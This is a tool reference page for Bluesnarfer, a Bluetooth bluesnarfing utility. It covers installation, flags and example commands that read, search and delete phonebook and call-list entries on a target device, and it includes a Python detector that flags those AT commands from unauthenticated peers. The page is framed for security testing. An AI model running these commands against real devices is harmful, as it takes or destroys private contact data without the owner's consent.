
Bluesnarfer

Bluesnarfer is a Bluetooth bluesnarfing utility that extracts data such as device information and phonebook entries from vulnerable Bluetooth-enabled devices. It targets weaknesses in Bluetooth implementations to gain unauthorized access to information.

Description

Bluesnarfer performs bluesnarfing attacks, which involve unauthorized access to data stored on Bluetooth devices like mobile phones. It exploits vulnerabilities in the Bluetooth protocol to retrieve sensitive information such as phonebook contacts, call lists, and device details without proper authentication. This tool is particularly useful for security researchers testing Bluetooth security and penetration testers assessing wireless device vulnerabilities.

The utility supports various phonebook storage types (such as SIM, dialed calls, and received calls) and allows targeted extraction or deletion of entries. Use cases include auditing corporate device security, demonstrating Bluetooth risks in red team exercises, and educational purposes in wireless security training. It requires the target device's Bluetooth address and optionally an RFCOMM channel.

Bluesnarfer operates by sending specific AT commands over Bluetooth connections to vulnerable devices, leveraging poor implementations of the OBEX protocol or authentication mechanisms.

How It Works

Bluesnarfer connects to Bluetooth devices via RFCOMM channels and sends AT commands (GSM extensions) to access phonebook and call data. It exploits vulnerabilities in Bluetooth stack implementations where devices fail to properly authenticate or restrict access to Object Exchange (OBEX) services. The tool targets specific memory storages such as the SIM phonebook (SM), dialed calls (DC), or received calls (RC), reading or manipulating entries by index range.
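As an added example (not bluesnarfer's code and not part of the original page), this Python flags phonebook access in AT-command lines logged from an RFCOMM channel on a device under test. It assumes the traffic uses the standard 3GPP TS 27.007 phonebook commands (AT+CPBS, AT+CPBR, AT+CPBF, AT+CPBW); the record format, addresses and function names are constructed for illustration.

```python
import re

# Phonebook AT commands from 3GPP TS 27.007 (assumption: this is what phonebook
# select/read/search/delete over RFCOMM looks like on the wire).
AT_RE = re.compile(r'^AT\+(CPBS|CPBR|CPBF|CPBW)(=\?|\?|=(.*))?$', re.I)
STORAGE = {"SM": "SIM phonebook", "DC": "dialed calls", "RC": "received calls"}

def classify(payload):
    """Map one AT line to (action, detail), or None if it is not phonebook access."""
    m = AT_RE.match(payload.strip())
    if not m:
        return None
    cmd, args = m.group(1).upper(), m.group(3)
    if args is None:                      # bare, "?" or "=?" form: a query only
        return ("query", cmd)
    fields = [f.strip() for f in args.split(",")]
    if cmd == "CPBS":
        code = fields[0].strip('"').upper()
        return ("select-storage", STORAGE.get(code, code))
    if cmd == "CPBR":
        return ("read", "-".join(fields[:2]))
    if cmd == "CPBF":
        return ("search", args.strip().strip('"'))
    # AT+CPBW=<index> with no number/text fields erases that entry.
    return ("delete", fields[0]) if len(fields) == 1 else ("write", fields[0])

def audit(records):
    """Alert on data-touching phonebook commands from unauthenticated peers."""
    alerts = []
    for peer, authenticated, payload in records:
        hit = classify(payload)
        if hit and not authenticated and hit[0] in {"read", "search", "delete", "write"}:
            alerts.append((peer, *hit))
    return alerts

# Constructed sample: (peer address, link authenticated?, RFCOMM payload line).
SAMPLE = [
    ("00:11:22:33:44:55", False, 'AT+CPBS=?'),
    ("00:11:22:33:44:55", False, 'AT+CPBS="SM"'),
    ("00:11:22:33:44:55", False, 'AT+CPBR=1,10'),
    ("00:11:22:33:44:55", False, 'AT+CPBF="John"'),
    ("00:11:22:33:44:55", False, 'AT+CPBW=5'),
    ("66:77:88:99:AA:BB", True,  'AT+CPBR=1,10'),   # authenticated peer: not flagged
    ("00:11:22:33:44:55", False, 'AT+CGMI'),        # not a phonebook command: ignored
]

if __name__ == "__main__":
    for alert in audit(SAMPLE):
        print(alert)
```

Any alert from `audit` means an unauthenticated peer reached phonebook data, which is the condition the tool depends on.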

Installation

sudo apt install bluesnarfer

Flags

-b  Bluetooth device address
-C  Bluetooth RFCOMM channel
-c  Custom AT command action
-r  Read phonebook entry N to M
-w  Delete phonebook entry N to M
-f  Search for name in phonebook address
-s  Select phonebook memory storage TYPE
-l  List available phonebook memory storage
-i  Get device info

Examples

Scan the remote device and get device info:
bluesnarfer -b 20:C9:D0:43:4B:D8 -i

List available phonebook memory storage:
bluesnarfer -b 20:C9:D0:43:4B:D8 -l

Select SIM phonebook memory storage:
bluesnarfer -b 20:C9:D0:43:4B:D8 -s SM

Read phonebook entries 1 to 10:
bluesnarfer -b 20:C9:D0:43:4B:D8 -r 1-10

Search for contact name 'John' in phonebook:
bluesnarfer -b 20:C9:D0:43:4B:D8 -f John

Select dialed call list phonebook storage:
bluesnarfer -b 20:C9:D0:43:4B:D8 -s DC

Delete phonebook entries 5 to 10:
bluesnarfer -b 20:C9:D0:43:4B:D8 -w 5-10

Updated 2026-04-16 (source: kali.org)